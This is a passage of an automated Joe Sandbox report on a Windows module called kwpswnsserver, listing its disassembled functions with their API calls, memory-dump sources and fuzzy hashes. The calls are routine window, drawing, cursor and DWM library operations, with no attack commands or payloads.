                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmSetWindowAttribute$dwmapi.dll
                                                                  • API String ID: 1102202064-3105884578
                                                                  • Opcode ID: 21c9af1433c712d8a00b01e52ab0de7ec595749e91eff6bab167e6f73bf7ee60
                                                                  • Instruction ID: 828131a829ffcc8ad507a2bfec3b9b592e3c992c52604fc048dc5748b2d6857e
                                                                  • Opcode Fuzzy Hash: 21c9af1433c712d8a00b01e52ab0de7ec595749e91eff6bab167e6f73bf7ee60
                                                                  • Instruction Fuzzy Hash: 6CF0BB3565132BEFCF251FA8CD1885A3BB4AB067593008611FC09D6644D730C8128BA0
                                                                  Function 6C8A67EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6825
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6C8A680E
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6817
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmSetIconicThumbnail$dwmapi.dll
                                                                  • API String ID: 1102202064-2331651847
                                                                  • Opcode ID: 94fc98718f80feeeeea32de0ba29d4c5e2d5a47b77f578a526464ab7c98fe4f3
                                                                  • Instruction ID: 0d40190e4f0b9126a8355770a2b54680c6339946516ad3109f78ee54c4599e8d
                                                                  • Opcode Fuzzy Hash: 94fc98718f80feeeeea32de0ba29d4c5e2d5a47b77f578a526464ab7c98fe4f3
                                                                  • Instruction Fuzzy Hash: 84F05B7564133BABCF391FA88D1C9593F7CAF066997418521FC19D6744D730C44386A0
                                                                  Function 6C8A6728 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89F0CE,6CA5821C,0000002C), ref: 6C8A6761
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 6C8A674A
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C89F0CE,6CA5821C,0000002C), ref: 6C8A6753
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmIsCompositionEnabled$dwmapi.dll
                                                                  • API String ID: 1102202064-1198327662
                                                                  • Opcode ID: fe85fac2fa8126ae16acd06370eed0416cc17ae7a83d1a22589a63b34b2655ab
                                                                  • Instruction ID: 3cd62c39e2020bc9119dd3be0e3e515855b90ddfe8c9d7e2fe225ad22fb0426a
                                                                  • Opcode Fuzzy Hash: fe85fac2fa8126ae16acd06370eed0416cc17ae7a83d1a22589a63b34b2655ab
                                                                  • Instruction Fuzzy Hash: 8DF0E03971132B9FCB1577BCCD1865A37B4BB0B7597008611FC05D7A44EB30C80286D0
                                                                  Function 6C8A684E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6887
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 6C8A6870
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6879
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmInvalidateIconicBitmaps$dwmapi.dll
                                                                  • API String ID: 1102202064-1901905683
                                                                  • Opcode ID: 9845fdb6d43bc07201db8286813571cb398b9a1b62e04dbcf6211e2c213b67a8
                                                                  • Instruction ID: 6f03072c5f675d882f4718332b65d09b3dea3b971f5496c2adf87c88f6287ea9
                                                                  • Opcode Fuzzy Hash: 9845fdb6d43bc07201db8286813571cb398b9a1b62e04dbcf6211e2c213b67a8
                                                                  • Instruction Fuzzy Hash: EAF0823564133B9F8E3927AD8D1885937BCAB06799345C921EC05D6A08DB2488438AA0
                                                                  Function 6C8C639B Relevance: 7.9, APIs: 5, Instructions: 385COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8C6DF9: PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C6E33
                                                                    • Part of subcall function 6C8C6DF9: SetRectEmpty.USER32(?), ref: 6C8C6E5B
                                                                    • Part of subcall function 6C8C6DF9: GetDesktopWindow.USER32 ref: 6C8C6E73
                                                                    • Part of subcall function 6C8C6DF9: LockWindowUpdate.USER32(?,00000000), ref: 6C8C6E84
                                                                    • Part of subcall function 6C8C6DF9: GetDCEx.USER32(?,00000000,00000003), ref: 6C8C6E9B
                                                                    • Part of subcall function 6C883389: GetLayout.GDI32(?,6C8C63CC), ref: 6C88338C
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C63FD
                                                                    • Part of subcall function 6C883393: SetLayout.GDI32(?,?), ref: 6C88339C
                                                                    • Part of subcall function 6C8C6235: AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 6C8C6245
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8C671B
                                                                  • InflateRect.USER32(00000000,00000002,00000002), ref: 6C8C6732
                                                                    • Part of subcall function 6C8C74B2: OffsetRect.USER32(?,00000000,00000000), ref: 6C8C74EB
                                                                    • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67B7
                                                                    • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67C3
                                                                    • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67CF
                                                                    • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67DB
                                                                    • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C7021
                                                                    • Part of subcall function 6C8C7017: SetCapture.USER32(?), ref: 6C8C7035
                                                                    • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C7041
                                                                    • Part of subcall function 6C8C7017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8C705F
                                                                    • Part of subcall function 6C8C7017: DispatchMessageW.USER32(?), ref: 6C8C709B
                                                                    • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C70F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Offset$CaptureWindow$Message$InflateLayout$AdjustDesktopDispatchEmptyLockPeekUpdate
                                                                  • String ID:
                                                                  • API String ID: 2444846054-0
                                                                  • Opcode ID: 0af54804c7653b464ae3a82eb5f20b6c7512e9482bc0aa9acc8fc924876c11e9
                                                                  • Instruction ID: c1cef7df703340f34f2f9d8d59d81898c9f7094d658eff36374a12e49c273db5
                                                                  • Opcode Fuzzy Hash: 0af54804c7653b464ae3a82eb5f20b6c7512e9482bc0aa9acc8fc924876c11e9
                                                                  • Instruction Fuzzy Hash: 4FE12571E006199FCF15CF98C940AEEBBB2BF49314F15812AF919BB350DB71A942CB94
                                                                  Function 6C95242D Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C952437
                                                                  • InflateRect.USER32(?,000000FB,00000000), ref: 6C952537
                                                                  • InflateRect.USER32(?,000000FC,00000000), ref: 6C952546
                                                                  • FillRect.USER32(E85ECD33,?,00000000), ref: 6C9525D6
                                                                  • GetTextMetricsW.GDI32(FFFC3186,?), ref: 6C9526A4
                                                                    • Part of subcall function 6C8C9A5D: InflateRect.USER32(?,00000000,000000FD), ref: 6C8C9AB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Inflate$FillH_prolog3_MetricsText
                                                                  • String ID:
                                                                  • API String ID: 2951402353-0
                                                                  • Opcode ID: fd26ab025a4a978f2d9f6c400a56ffaaae51cec83fafc82ecac7082b0018e764
                                                                  • Instruction ID: 5e74b598d4b3e996ab1729c4b459c82488cd393ca9ec0ba3dbea33e58c2c91af
                                                                  • Opcode Fuzzy Hash: fd26ab025a4a978f2d9f6c400a56ffaaae51cec83fafc82ecac7082b0018e764
                                                                  • Instruction Fuzzy Hash: 18B14971A00619DFCF14CF68C998AEEBBB9BF49304F504669E816AB781DB30E905CF50
                                                                  Function 6C8BACF7 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BACFE
                                                                  • IsWindow.USER32(00000000), ref: 6C8BAD12
                                                                  • GetClientRect.USER32(00000000,00000000), ref: 6C8BAD67
                                                                  • GetCursorPos.USER32(?), ref: 6C8BAF30
                                                                  • ScreenToClient.USER32(00000000,?), ref: 6C8BAF3D
                                                                    • Part of subcall function 6C8B5891: __EH_prolog3_GS.LIBCMT ref: 6C8B589B
                                                                    • Part of subcall function 6C8B5891: GetClientRect.USER32(00000000,00000000), ref: 6C8B58F5
                                                                    • Part of subcall function 6C8B36CB: __EH_prolog3_GS.LIBCMT ref: 6C8B36D5
                                                                    • Part of subcall function 6C8B36CB: SendMessageW.USER32(00000000,0000040D,00000000,00000000), ref: 6C8B3700
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientH_prolog3_$Rect$CursorMessageScreenSendWindow
                                                                  • String ID:
                                                                  • API String ID: 3214297127-0
                                                                  • Opcode ID: 03903e79603881bf156c0eb079048444d4b13e9ff215bdd8f0fa7cf5c2ee1e40
                                                                  • Instruction ID: 69868081405bc77b716e07bb661727be4abb2820663ce47cb471e66e4cb8096f
                                                                  • Opcode Fuzzy Hash: 03903e79603881bf156c0eb079048444d4b13e9ff215bdd8f0fa7cf5c2ee1e40
                                                                  • Instruction Fuzzy Hash: AB918971A012198FCF25DFA8CA80ADDBBB5BF49309F14457AE805BB755DB30A909CF60
                                                                  Function 6C952762 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(8B6CA5B0), ref: 6C95279E
                                                                  • IsRectEmpty.USER32(?), ref: 6C9527C3
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952889
                                                                  • FillRect.USER32(?,?,?), ref: 6C9528C0
                                                                  • InflateRect.USER32(?,00000000,000000FF), ref: 6C9528FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Fill$EmptyInflateParent
                                                                  • String ID:
                                                                  • API String ID: 2418387936-0
                                                                  • Opcode ID: 4d90af957cac1bd12c71e0f8fddfd974201ff92b0b0aaf4f1e4d1378a340e738
                                                                  • Instruction ID: 303e4e8ff1e011ea4ca8317960beec09fa8e71395dacaf0863a939b06d019963
                                                                  • Opcode Fuzzy Hash: 4d90af957cac1bd12c71e0f8fddfd974201ff92b0b0aaf4f1e4d1378a340e738
                                                                  • Instruction Fuzzy Hash: E071D372A00A0A9FCF05DFA8CD589EF77B9FF45308F514529FA11AB640DB35E8118BA0
                                                                  Function 6C95453A Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954576
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C954584
                                                                  • InflateRect.USER32(?,?,000000FF), ref: 6C9545FF
                                                                  • InflateRect.USER32(?,00000000,000000FF), ref: 6C954694
                                                                  • FillRect.USER32(550018C2,?,00000000), ref: 6C9546B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Inflate$Fill
                                                                  • String ID:
                                                                  • API String ID: 309753019-0
                                                                  • Opcode ID: fac0fe71ed9a0c77a535a506d33047b19e599bcdd7ccfe23c059c6616eea45ee
                                                                  • Instruction ID: 106cac2fb795319b170fec49de56a0e2c269f6039427663dfb1d6c1d77d9ce1d
                                                                  • Opcode Fuzzy Hash: fac0fe71ed9a0c77a535a506d33047b19e599bcdd7ccfe23c059c6616eea45ee
                                                                  • Instruction Fuzzy Hash: 5D517075A0161ADFCF04DFA8C8849AE77B9BF49314B418269E816EB390DB30E915CF90
                                                                  Function 6C8BDCC7 Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BDCEF
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                  • PtInRect.USER32(?,00000000,?), ref: 6C8BDD09
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BDD82
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRect$Screen
                                                                  • String ID:
                                                                  • API String ID: 3187875807-0
                                                                  • Opcode ID: 49efb3f22ff19e212cbf65ac7e9c5da405b40d8725bc0b27fb65fbc457841f10
                                                                  • Instruction ID: cb20cb11b07381676156915b949aebdec30d8cc415bb4dfff0899762e828bf00
                                                                  • Opcode Fuzzy Hash: 49efb3f22ff19e212cbf65ac7e9c5da405b40d8725bc0b27fb65fbc457841f10
                                                                  • Instruction Fuzzy Hash: 7B414272A0060AEFCF20CFA8CA849DE7BB5FF06349F144966E945FB614D731AA45CB50
                                                                  Function 6C886D07 Relevance: 7.6, APIs: 5, Instructions: 108keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(00000000), ref: 6C886D1C
                                                                  • GetKeyState.USER32(00000011), ref: 6C886D24
                                                                  • ScreenToClient.USER32(?,00000000), ref: 6C886DBC
                                                                  • ClientToScreen.USER32(?,00000000), ref: 6C886E09
                                                                  • SetCursorPos.USER32(00000000,00000000), ref: 6C886E15
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorScreen$State
                                                                  • String ID:
                                                                  • API String ID: 3982492586-0
                                                                  • Opcode ID: 5815d29cbc9c8f38b217c377220092dbc0c397baec71f56e7a4a8ed4b7f6baa3
                                                                  • Instruction ID: 1b1d540f7c446ec4d3b8f4f2190df40673696fd2d1d2034c83b4f6efa1fc53ec
                                                                  • Opcode Fuzzy Hash: 5815d29cbc9c8f38b217c377220092dbc0c397baec71f56e7a4a8ed4b7f6baa3
                                                                  • Instruction Fuzzy Hash: 8C310972A12519EFCB29CFB8CA55BADBBB1FF46316F204A29E412D7D90D7319A408740
                                                                  Function 6C8B8B93 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorScreen$Rect
                                                                  • String ID:
                                                                  • API String ID: 1082406499-0
                                                                  • Opcode ID: 47b8a2cdc92e8d8bd0ab56167813a60c60d5ed9267b41ced2e65484b9693dfef
                                                                  • Instruction ID: fdc432779b72c542dd4b03823cff564cd5fcd232c4c679a35e18d3ec652298d9
                                                                  • Opcode Fuzzy Hash: 47b8a2cdc92e8d8bd0ab56167813a60c60d5ed9267b41ced2e65484b9693dfef
                                                                  • Instruction Fuzzy Hash: 8D31BE71B0121BDFCF59DFA4CA94AAEB7B5BF49308F11462AE415A3700DB30A956CB90
                                                                  Function 6C88262F Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(?), ref: 6C8820A4
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(00000000), ref: 6C8820AB
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 6C88268F
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 6C8826E3
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 6C8826F2
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 6C882708
                                                                  • GetClientRect.USER32(?,?), ref: 6C88271C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
